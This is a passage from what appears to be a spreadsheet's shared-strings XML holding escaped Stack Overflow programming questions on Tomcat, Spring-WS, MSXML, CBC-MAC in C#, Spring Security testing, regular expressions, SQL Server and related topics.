    <t xml:space="preserve">&lt;p&gt;Are there any &lt;em&gt;good&lt;/em&gt; "Getting started with Tomcat" documents/tutorials/sites?&lt;/p&gt;
&lt;p&gt;The official docs are horribly written and jump from the intricacies of compiling Tomcat to how you should lay out your site on disk.&lt;/p&gt;
&lt;p&gt;Specifically I want to get Tomcat serving through Apache httpd.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spring-WS: how to use WebserviceTemplate with pre-generated SOAP-envelope</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can you use a Spring-WS WebserviceTemplate for calling a webservice and avoid that it generates a SOAP-envelope? That is, the message already contains an SOAP-Envelope and I don't want that the WebserviceTemplate wraps another one around it. :-)&lt;/p&gt;
&lt;p&gt;The reason I want this is that I'd like to call a webservice that uses ws-security and do not want to put the ws-security stuff into the WebserviceTemplate, but just want to feed it a message with pre-generated ws-security information in the SOAP-envelope. I tried calling the method &lt;a href="http://static.springsource.org/spring-ws/sites/1.5/apidocs/org/springframework/ws/client/core/WebServiceTemplate.html#sendSourceAndReceiveToResult(java.lang.String,%20javax.xml.transform.Source,%20javax.xml.transform.Result)" rel="nofollow"&gt;sendSourceAndReceiveToResult&lt;/a&gt; with a Source already contains a Soap-Envelope with the WS-Security stuff and the webservice template wraps around another Soap-Envelope and thus destroys the message.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get the value data out of an MSXML::IXMLDOMElement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an xml string &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;grandparent&amp;gt;
   &amp;lt;parent&amp;gt;
       &amp;lt;child&amp;gt;dave&amp;lt;/child&amp;gt;
       &amp;lt;child&amp;gt;laurie&amp;lt;/child&amp;gt;
       &amp;lt;child&amp;gt;gabrielle&amp;lt;/child&amp;gt;
   &amp;lt;/parent&amp;gt;
&amp;lt;/grandparrent&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I want to get is the data raw xml that's inside the parent. 
I'm using MSXML &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;iXMLElm-&amp;gt;get_xml(&amp;amp;bStr);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is returning&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;parent&amp;gt;
   &amp;lt;child&amp;gt;dave&amp;lt;/child&amp;gt;
   &amp;lt;child&amp;gt;laurie&amp;lt;/child&amp;gt;
   &amp;lt;child&amp;gt;gabrielle&amp;lt;/child&amp;gt;
&amp;lt;/parent&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;iXMLElm-&amp;gt;get_text(&amp;amp;bStr);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;returns 
davelauriegabrielle&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What function do I use if I want to get?&lt;/strong&gt; &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;child&amp;gt;dave&amp;lt;/child&amp;gt;
   &amp;lt;child&amp;gt;laurie&amp;lt;/child&amp;gt;
   &amp;lt;child&amp;gt;gabrielle&amp;lt;/child&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is anyone aware of some good documentation on these functions? Everything I've seen is a linked nightmare. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I force the PropertyGrid to show a custom dialog for a specific property?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a class with a string property, having both a getter and a setter, that is often so long that the PropertyGrid truncates the string value. How can I force the PropertyGrid to show an ellipsis and then launch a dialog that contains a multiline textbox for easy editing of the property? I know I probably have to set some kind of attribute on the property, but what attribute and how? Does my dialog have to implement some special designer interface?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;
&lt;a href="http://stackoverflow.com/questions/130032/multi-line-string-in-a-propertygrid"&gt;This&lt;/a&gt; is probably the answer to my question, but I could not find it by searching. My question is more general, and its answer can be used to build any type of custom editor.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I add a big flash banner to the top of my Wordpress blog?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I don't know if it is possible to add a Flash banner into a Wordpress theme... Ideally, this banner would be in the header of the site always. Any ideas on how I might accomplish this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delete All Emails in a Highrise App</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I delete all the emails in my &lt;a href="http://highrisehq.com/" rel="nofollow"&gt;highrise&lt;/a&gt; app? I don't want to delete the entire thing and start over, I've got companies and tags and metadata. What's the easiest way?&lt;/p&gt;
&lt;p&gt;This question paraphrased from &lt;a href="http://getsatisfaction.com/people/tiborholoda" rel="nofollow"&gt;Tibor Holoda&lt;/a&gt;'s &lt;a href="http://getsatisfaction.com/37signals/topics/can_you_help_me_deleting_all_emails_and_start_again_please" rel="nofollow"&gt;question&lt;/a&gt; on &lt;a href="http://getsatisfaction.com" rel="nofollow"&gt;GetSatisfaction&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get a file system handle to a bluetooth mapped folder</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to get code level access to a bluetooth mapped drive?  The simple use case is I have a bluetooth folder in Explorer that looks something like:&lt;/p&gt;
&lt;p&gt;"My Bluetooth Places\Entire Bluetooth Neighborhood\DEV1\OBEX File Transfer\E:\" &lt;/p&gt;
&lt;p&gt;which maps to a device root, and I want to be able to read/write to the file system by treating it as a standard directory.&lt;/p&gt;
&lt;p&gt;Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are pitfalls for agile development methodologies?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are pitfalls for agile development methodologies?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Localizing system generated status messages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working in a .NET environment where the system occasionally generates log entries for a customer. Messages are then appended to a customer log which can be reviewed at a later time.&lt;/p&gt;
&lt;p&gt;For example, if a customer is subscribing to a new service, or a customer has a failed payment attempt, these messages gets appended to the customer log.&lt;/p&gt;
&lt;p&gt;At the moment, all messages are hardcoded into the code, e.g "Customer failed to finish payment of XX".&lt;/p&gt;
&lt;p&gt;The problem is now that these messages need to be localized in a smart way, such that when a English user reviews the customer log, he gets the messages in English, and when a foreign user reviews the log, he gets them in his language.&lt;/p&gt;
&lt;p&gt;What would be the best way to handle this scenario?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set up MySQL to work with C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been tasked with creating a new frontend for a legacy website.&lt;/p&gt;
&lt;p&gt;It is written in php (pre-oo), and uses a MySQL database. The hosting provides a .Net package, but does not offer Ms Sql Server. &lt;/p&gt;
&lt;p&gt;This is fine, as the database is working fine, but I really want to use Asp.net for the pages. However, most tutorials I've seen on connecting to MySQL from C# require installing an ODBC Driver specifically for MySQL. Not controlling the hosting env, I doubt I'll be able to do just that :)&lt;/p&gt;
&lt;p&gt;Have you got any insight to share on this issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How good is Apache POI word support?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On the web page, it looks like there is no current development in the old style .doc.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is it good enough to create complex documents? &lt;/li&gt;
&lt;li&gt;Can it read all .docs without crashing?&lt;/li&gt;
&lt;li&gt;What features do (not) work?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I am not currently interested in the XML based formats, as I don't control the client side. &lt;/p&gt;
&lt;p&gt;The excel support seems to be much better.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Set Variable from an Array directly into a List of Variables in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Java method which returns an array of doubles. I would then like to store these values in individual variables in the calling function. Is there an elegant way of doing this in Java.&lt;/p&gt;
&lt;p&gt;I could write it as this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;double[] returnValues = calculateSomeDoubles();
double firstVar  = returnValues[0];
double secondVar = returnValues[1];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I was just wondering if there was some way of compressing this down to a single line? Something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(firstVar, secondVar) = calculateSomeDoubles();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This type of thing is quite easy when scripting, but the stronger typing of Java means it probably isn't possible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which is faster, Hash lookup or Binary search?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When given a static set of objects (static in the sense that once loaded it seldom if ever changes) into which repeated concurrent lookups are needed with optimal performance, which is better, a &lt;code&gt;HashMap&lt;/code&gt; or an array with a binary search using some custom comparator?&lt;/p&gt;
&lt;p&gt;Is the answer a function of object or struct type?  Hash and/or Equal function performance?  Hash uniqueness?  List size?  &lt;code&gt;Hashset&lt;/code&gt; size/set size?&lt;/p&gt;
&lt;p&gt;The size of the set that I'm looking at can be anywhere from 500k to 10m - incase that information is useful.&lt;/p&gt;
&lt;p&gt;While I'm looking for a C# answer, I think the true mathematical answer lies not in the language, so I'm not including that tag.  However, if there are C# specific things to be aware of, that information is desired.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mixing Qt and Boost</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking at starting a project in C++ using the Qt 4 framework (a cross-platform GUI is required).  I've heard great things about the Boost libraries from friends and online.  I've started reading up on both and wanted to ask a cursory question before I got too deep: Are these two development "systems" mutually exclusive? &lt;/p&gt;
&lt;p&gt;My initial searching and reading shows some overlap in the signal handling, custom build systems, and other low-level primitives.&lt;/p&gt;
&lt;p&gt;Does it make sense to use them both in the same project?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multi core programming</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to get into multi core programming (not language specific) and wondered what hardware could be recommended for exploring this field.
My aim is to upgrade my existing desktop.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ISO 9797-1 Algorithm 1 [CBC-MAC] in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It seems that there're 6 variations to CBC-MAC algorithm.  I've been trying to match the MAC algorithm on the PINPad 1000SE [which per manual is ISO 9797-1 Algorithm 1].&lt;/p&gt;
&lt;p&gt;I got an excellent start from &lt;a href="http://bytes.com/topic/net/answers/654069-iso-iec-9797-1-cbc-mac-using-vb-net" rel="nofollow"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;And I coded the algorithm as below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static byte[] CalculateMAC(this IPinPad pinpad, byte[] message, byte[] key)
{
    //Divide the key with Key1[ first 64 bits] and key2 [last 64 bits]
    var key1 = new byte[8];
    Array.Copy(key, 0, key1, 0, 8);
    var key2 = new byte[8];
    Array.Copy(key, 8, key2, 0, 8); //64 bits
    //divide the message into 8 bytes blocks
    //pad the last block with "80" and "00","00","00" until it reaches 8 bytes
    //if the message already can be divided by 8, then add 
    //another block "80 00 00 00 00 00 00 00"
    Action&amp;lt;byte[], int&amp;gt; prepArray = (bArr, offset) =&amp;gt;
                                     {
                                         bArr[offset] = 0; //80
                                         for (var i = offset + 1; i &amp;lt; bArr.Length; i++)
                                             bArr[i] = 0;
                                     };
    var length = message.Length;
    var mod = length &amp;gt; 8? length % 8: length - 8;
    var newLength = length + ((mod &amp;lt; 0) ? -mod : (mod &amp;gt; 0) ? 8 - mod : 0);
    //var newLength = length + ((mod &amp;lt; 0) ? -mod : (mod &amp;gt; 0) ? 8 - mod : 8);
    Debug.Assert(newLength % 8 == 0);
    var arr = new byte[newLength];
    Array.Copy(message, 0, arr, 0, length);
    //Encoding.ASCII.GetBytes(message, 0, length, arr, 0);
    prepArray(arr, length);
    //use initial vector {0,0,0,0,0,0,0,0} 
    var vector = new byte[] { 0, 0, 0, 0, 0, 0, 0, 0 };
    //encrypt by DES CBC algorith with the first key KEY 1
    var des = new DESCryptoServiceProvider { Mode = CipherMode.CBC };
    var cryptor = des.CreateEncryptor(key1, vector);
    var outputBuffer = new byte[arr.Length];
    cryptor.TransformBlock(arr, 0, arr.Length, outputBuffer, 0);
    //Decrypt the result by DES ECB with the second key KEY2 [Original suggestion]
    //Now I'm Encrypting
    var decOutputBuffer = new byte[outputBuffer.Length];
    des.Mode = CipherMode.ECB;
    var decryptor = des.CreateEncryptor(key2, vector);
    //var decryptor = des.CreateDecryptor(key2, vector);
    decryptor.TransformBlock(outputBuffer, 0, outputBuffer.Length, decOutputBuffer, 0);
    //Encrypt the result by DES ECB with the first key KEY1
    var finalOutputBuffer = new byte[decOutputBuffer.Length];
    var cryptor2 = des.CreateEncryptor(key1, vector);
    cryptor2.TransformBlock(decOutputBuffer, 0, decOutputBuffer.Length, finalOutputBuffer, 0);
    //take the first 4 bytes as the MAC
    var rval = new byte[4];
    Array.Copy(finalOutputBuffer, 0, rval, 0, 4);
    return rval;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I discovered there're 3 padding schemes and the one that gave me a start may not necessarily be right.  The manual came to my rescue again.  It seems the device only pads with 0s. Additional block is also nowhere mentioned so I made the below changes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    Action&amp;lt;byte[], int&amp;gt; prepArray = (bArr, offset) =&amp;gt;
                                     {
                                         bArr[offset] = 0; ... }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;No additional block (if mod 0 [divisible by 8] do not change array length)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var newLength = length + ((mod &amp;lt; 0) ? -mod : (mod &amp;gt; 0) ? 8 - mod : 0);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The original suggestion wanted me to decrypt at the second step... but Valery &lt;a href="http://www.derkeiler.com/Newsgroups/microsoft.public.dotnet.security/2005-04/0180.html" rel="nofollow"&gt;here&lt;/a&gt; suggests that it's encrypt all the way.  So I changed Decrypt to Encrypt.  But still I'm unable to get the requisite MAC...&lt;/p&gt;
&lt;p&gt;Manual says for key "6AC292FAA1315B4D8234B3A3D7D5933A" [since the key should be 16 bytes, I figured the key here's hex string so I took byte values of 6A, C2, 92, FA...
new byte[] { 106, 194, 146, ...] the MAC should be 7B,40,BA,95 [4 bytes] if the message is [0x1a + byte array of MENTERODOMETER]&lt;/p&gt;
&lt;p&gt;Can someone help?  Please?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Since Pinpad requires that the first character in message is a 0x1a...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static byte[] CalculateAugmentedMAC(this IPinPad pinpad, string message, byte[] key)
{
    var arr = new byte[message.Length + 1];
    var source = Encoding.ASCII.GetBytes(message);
    arr[0] = 0x1a; //ClearScreenIndicator
    Array.Copy(source, 0, arr, 1, source.Length);
    return CalculateMAC(pinpad, arr, key);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm calling the code above with this input:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var result = pad.CalculateAugmentedMAC("MENTERODOMETER", new byte[] { 106, 194, 146, 250, 161, 49, 91, 77, 130, 52, 179, 163, 215, 213, 147, 58 });
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2005 -Seeing SPs executing inside SPs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am wondering if it is possible to see stored procs that are being executed by other stored procs in Sql Server Profiler, is it possible, and if so how?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unit testing with Spring Security</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company has been evaluating Spring MVC to determine if we should use it in one of our next projects. So far I love what I've seen, and right now I'm taking a look at the Spring Security module to determine if it's something we can/should use. &lt;/p&gt;
&lt;p&gt;Our security requirements are pretty basic; a user just needs to be able to provide a username and password to be able to access certain parts of the site (such as to get info about their account); and there are a handful of pages on the site (FAQs, Support, etc) where an anonymous user should be given access.&lt;/p&gt;
&lt;p&gt;In the prototype I've been creating, I have been storing a "LoginCredentials" object (which just contains username and password) in Session for an authenticated user; some of the controllers check to see if this object is in session to get a reference to the logged-in username, for example. I'm looking to replace this home-grown logic with Spring Security instead, which would have the nice benefit of removing any sort of "how do we track logged in users?" and "how do we authenticate users?" from my controller/business code. &lt;/p&gt;
&lt;p&gt;It seems like Spring Security provides a (per-thread) "context" object to be able to access the username/principal info from anywhere in your app...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Object principal = SecurityContextHolder.getContext().getAuthentication().getPrincipal();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... which seems very un-Spring like as this object is a (global) singleton, in a way.&lt;/p&gt;
&lt;p&gt;My question is this: if this is the standard way to access information about the authenticated user in Spring Security, what is the accepted way to inject an Authentication object into the SecurityContext so that it is available for my unit tests when the unit tests require an authenticated user?&lt;/p&gt;
&lt;p&gt;Do I need to wire this up in the initialization method of each test case?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void setUp() throws Exception {
    ...
    SecurityContextHolder.getContext().setAuthentication(
		new UsernamePasswordAuthenticationToken(testUser.getLogin(), testUser.getPassword()));
    ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This seems overly verbose. Is there an easier way? &lt;/p&gt;
&lt;p&gt;The &lt;code&gt;SecurityContextHolder&lt;/code&gt; object itself seems very un-Spring-like...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse PDT HTML attribute assignment operator colour?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to know how to change the colour of the equality sign and double quotes for html documents in the eclipse PDT IDE. I can change most colours in Preferences -&gt; Web &amp;amp; XML -&gt; HTML Files -&gt; syntax coloring, but can't change the characters &lt;code&gt;=&lt;/code&gt; or &lt;code&gt;"&lt;/code&gt; e.g. in an anchor tag &lt;code&gt;&amp;lt;a href=""&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;How to change these colours?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LinkageError: loader constraints violated when linking javax/xml/namespace/QName in Websphere6.1 using resteasy</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting this error when making a web services call. I couldn't figure out a workround for this. ANy help is greatly appreciated.&lt;/p&gt;
&lt;p&gt;related library I have is:
axis-1.3.jar&lt;br /&gt;
axis-jaxrpc-1.3.jar&lt;br /&gt;
axis-saaj-1.3.jar&lt;br /&gt;
axis-wsdl4j-1.5.1.jar &lt;/p&gt;
&lt;p&gt;jaxb-api-2.1.jar
jaxb-impl-2.1.8.jar
jaxen-1.1-beta-9.jar
jaxrs-api-1.0-beta-9.jar&lt;/p&gt;
&lt;p&gt;In websphere 61 admin setting is the following:
Enterprise Application
   -&gt; WAR Classloader Mode : PARENT_LAST
 * Web Module :
   -&gt; ClassLoader Mode :  application_FIRST&lt;/p&gt;
&lt;p&gt;Caused by: java.lang.LinkageError: loader constraints violated when linking javax/xml/namespace/QName class
        at com.sun.xml.bind.v2.model.impl.RuntimeBuiltinLeafInfoImpl.(RuntimeBuiltinLeafInfoImpl.java:224)
        at com.sun.xml.bind.v2.model.impl.RuntimeTypeInfoSetImpl.(RuntimeTypeInfoSetImpl.java:61)
        at com.sun.xml.bind.v2.model.impl.RuntimeModelBuilder.createTypeInfoSet(RuntimeModelBuilder.java:127)
        at com.sun.xml.bind.v2.model.impl.RuntimeModelBuilder.createTypeInfoSet(RuntimeModelBuilder.java:79)
        at com.sun.xml.bind.v2.model.impl.ModelBuilder.(ModelBuilder.java:152)
        at com.sun.xml.bind.v2.model.impl.RuntimeModelBuilder.(RuntimeModelBuilder.java:87)
        at com.sun.xml.bind.v2.runtime.JAXBContextImpl.getTypeInfoSet(JAXBContextImpl.java:432)
        at com.sun.xml.bind.v2.runtime.JAXBContextImpl.(JAXBContextImpl.java:297)
        at com.sun.xml.bind.v2.ContextFactory.createContext(ContextFactory.java:139)
        at com.sun.xml.bind.v2.ContextFactory.createContext(ContextFactory.java:117)
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
        at java.lang.reflect.Method.invoke(Method.java:585)
        at javax.xml.bind.ContextFinder.newInstance(ContextFinder.java:211)
        at javax.xml.bind.ContextFinder.find(ContextFinder.java:372)
        at javax.xml.bind.JAXBContext.newInstance(JAXBContext.java:574)
        at org.jboss.resteasy.plugins.providers.jaxb.JAXBContextWrapper.(JAXBContextWrapper.java:74)
        at org.jboss.resteasy.plugins.providers.jaxb.JAXBContextWrapper.(JAXBContextWrapper.java:99)
        at org.jboss.resteasy.plugins.providers.jaxb.XmlJAXBContextFinder.createContextObject(XmlJAXBContextFinder.java:48)
        at org.jboss.resteasy.plugins.providers.jaxb.AbstractJAXBContextFinder.createContext(AbstractJAXBContextFinder.java:114)
        at org.jboss.resteasy.plugins.providers.jaxb.XmlJAXBContextFinder.findCachedContext(XmlJAXBContextFinder.java:39)
        at org.jboss.resteasy.plugins.providers.jaxb.AbstractJAXBProvider.findJAXBContext(AbstractJAXBProvider.java:49)
        at org.jboss.resteasy.plugins.providers.jaxb.AbstractJAXBProvider.getMarshaller(AbstractJAXBProvider.java:112)
        at org.jboss.resteasy.plugins.providers.jaxb.AbstractJAXBProvider.writeTo(AbstractJAXBProvider.java:88)
        at org.jboss.resteasy.client.core.MessageBodyParameterMarshaller$ClientRequestEntity.(MessageBodyParameterMarshaller.java:88)
        at org.jboss.resteasy.client.core.MessageBodyParameterMarshaller.buildRequest(MessageBodyParameterMarshaller.java:51)
        at org.jboss.resteasy.client.core.ClientInvoker.invoke(ClientInvoker.java:197)
        at org.jboss.resteasy.client.core.ClientProxy.invoke(ClientProxy.java:46)
        at $Proxy51.updateAccount(Unknown Source)
        at com.amg.brides.wedsimple.client.WedSimpleClientImpl.updateAccount(WedSimpleClientImpl.java:72)
        at com.amg.brides.wedsimple.web.WedSimpleUpdateAccountEvent.invokeClient(WedSimpleUpdateAccountEvent.java:24)
        at com.amg.brides.wedsimple.web.AbstractWedSimpleAccountEvent.execute(AbstractWedSimpleAccountEvent.java:35)
        at com.amg.brides.util.WebEventProcessor.processEvents(WebEventProcessor.java:29)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Regular Expressions in unicode strings</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some unicode text that I want to clean up using regular expressions.  For example I have cases where u'(2'.  This exists because for formatting reasons the closing paren ends up in an adjacent html cell.  My initial solution to this problem was to look ahead at the contents of the next cell and using a string function determine if it held the closing paren.  I knew this was not a great solution but it worked.  Now I want to fix it but I can't seem to make the regular expression work.   &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;missingParen=re.compile(r"^\(\d[^\)]$")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My understanding of what I think I am doing:&lt;br /&gt;
^ at the beginning of the string I want to find&lt;br /&gt;
( an open paren, the paren has to be backslashed because it is a special character&lt;br /&gt;
\d I also want to find a single digit&lt;br /&gt;
[ I am creating a special character class&lt;br /&gt;
^ I don't want to find what follows&lt;br /&gt;
) which is a close paren&lt;br /&gt;
$ at the end of the string  &lt;/p&gt;
&lt;p&gt;And of course the plot thickens I made a silly assumption that because I placed a \d I would not find (33 but I am wrong so I added a {1} to my regular expression and that did not help, it matched (3333, so my problem is more complicated than I thought.  I want the string to be only an open paren and a single digit.  Is this the more clever approach &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;missingParen=re.compile(r"^\(\d$")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And note S Lott _I already tagged it beginner so you can't pick up any cheap points Not that I don't appreciate your insights I keep meaning to read your book, it probably has the answer&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to save objects when approval is needed to actually make changes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I have an object graph, let's just say it's an order. You have the order class, line item class, tracking number class, payment class. You get the idea.&lt;/p&gt;
&lt;p&gt;Now the business requirement is any user can change the order, but order changes must be approved by the manager. Until the manger approves nothing changes. Managers can change anything, at any time, without approval. &lt;/p&gt;
&lt;p&gt;What are the best practices for dealing with situations like this? Saving the many (possible) different states of the order object and eventually approving or rejecting the changes.&lt;/p&gt;
&lt;p&gt;i'm using C# and Nhibernate.&lt;/p&gt;
&lt;p&gt;Thanks, Kyle.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server to Excel 2007 - New Lines</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to retrieve data from an SQL Server 2000 server, and place into Excel. Which sounds simple I know.
I'm currently Copying, and Pasting into Excel, from Management Studio&lt;/p&gt;
&lt;p&gt;The problem is one of the columns is an address, and itâ€™s not retaining the newlines.
These new lines have to stay in the same cell in excel, I.E cannot take up 3 rows, for 3 lines of an address.&lt;/p&gt;
&lt;p&gt;In the SQL Data CHAR(10) and CHAR(13) are included, and other software pick up on these correctly.&lt;/p&gt;
&lt;p&gt;EDIT: Sorry I forgot to metion, I want the lines to be present in the cell, but not span multiple cells.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is domain logic?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is domain logic?  The Wikipedia page for domain logic redirects to business logic.  Are they the same thing, and, if not, how do they differ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sending data from one page to another server. Language agnostic</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'll try to keep this short and simple.
I haven't begun writing the code for this project yet, but I'm trying to work out the pre-coding logistics as of right now.&lt;/p&gt;
&lt;p&gt;What I am looking to do, is create a method of sending data from one/any site, to another remote server, which would generate a response for the user requesting the data be sent.&lt;/p&gt;
&lt;p&gt;Specifically, a web designer should be able to take a snippet of code I would have available on my website, implement it into their own page(s), and when a user browses their page(s), my service would be available.&lt;/p&gt;
&lt;p&gt;A specific example, a web designer with a website (&lt;code&gt;helloworld.com&lt;/code&gt;) could implement my code into their page (&lt;code&gt;helloworld.com/index.html&lt;/code&gt;). When a user is viewing the page (&lt;code&gt;/index.html&lt;/code&gt;), the user hovers the mouse over a text word (lemonade) for a couple seconds, a small dialog box pops up beside it, providing the user with some options specific to the text (example of an option would be "Define 'lemonade' at Dictionary.com") that if selected, would be processed at, and a response would be returned from my remote server (&lt;code&gt;myremoteserver.com&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;Obviously, I would want the code that designers would be using to be as lightweight and standalone as possible. Any ideas as to how I could execute this? Resources I should study, and methods I could implement?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Correct way to handle 2D z-indexing in a 3D scene (DirectX)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to achieve the following:&lt;/p&gt;
&lt;p&gt;Two 2D quads appear as though they are stacked one on top of the other (like two halves of the same texture) but are in fact seperated on the z axis by n coordinates. So that if a 3D object passes between them one half appears in front of the object and the other behind.&lt;/p&gt;
&lt;p&gt;Could i achieve this by applying orthogonal projection to the two quads and then normal perspective to the rest of the 3d data? Will this lose depth data?&lt;/p&gt;
&lt;p&gt;I hope my example isn't too misleading!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Datamart vs. reporting Cube, what are the differences?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The terms are used all over the place, and I don't know of crisp definitions.  I'm pretty sure I know what a data mart is.  And I've created reporting cubes with tools like Business Objects and Cognos.&lt;/p&gt;
&lt;p&gt;I've also had folks tell me that a datamart is more than just a collection of cubes.&lt;/p&gt;
&lt;p&gt;I've also had people tell me that a datamart is a reporting cube, nothing more.&lt;/p&gt;
&lt;p&gt;What are the distinctions you understand?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Sorting and hyphens</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to easily sort in SQL Server 2005 while ignoring hyphens in a string field?  Currently I have to do a REPLACE(fieldname,'-','') or a function to remove the hyphen in the sort clause.  I was hoping there was a flag I could set at the top of the stored procedure or something.&lt;/p&gt;
&lt;p&gt;Access and the GridView default sorting seems to ignore the hypen in strings.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How detect whether running under valgrind in make file or shell script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to detect whether my Makefile is running under valgrind (indirectly, using valgrind  --trace-children=yes), I know how to do it from C but I have not found a way to do it from a script,&lt;/p&gt;
&lt;p&gt;The earlier answers works on Linux only. For Mac OS X I am an going to grep for VALGRIND_STARTUP_PWD in the environment, unless someone has a better idea.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would I get the column names from a Model LINQ?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to get a list of the column names returned from a Model. Anyone know how this would be done, any help would be greatly appreciated.&lt;/p&gt;
&lt;p&gt;Example Code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var project = db.Projects.Single(p =&amp;gt; p.ProjectID.Equals(Id));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code would return the Projects object, how would I get a list of all the column names in this Model.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Representing sparse integer sets?</t>
  </si>
  <si>
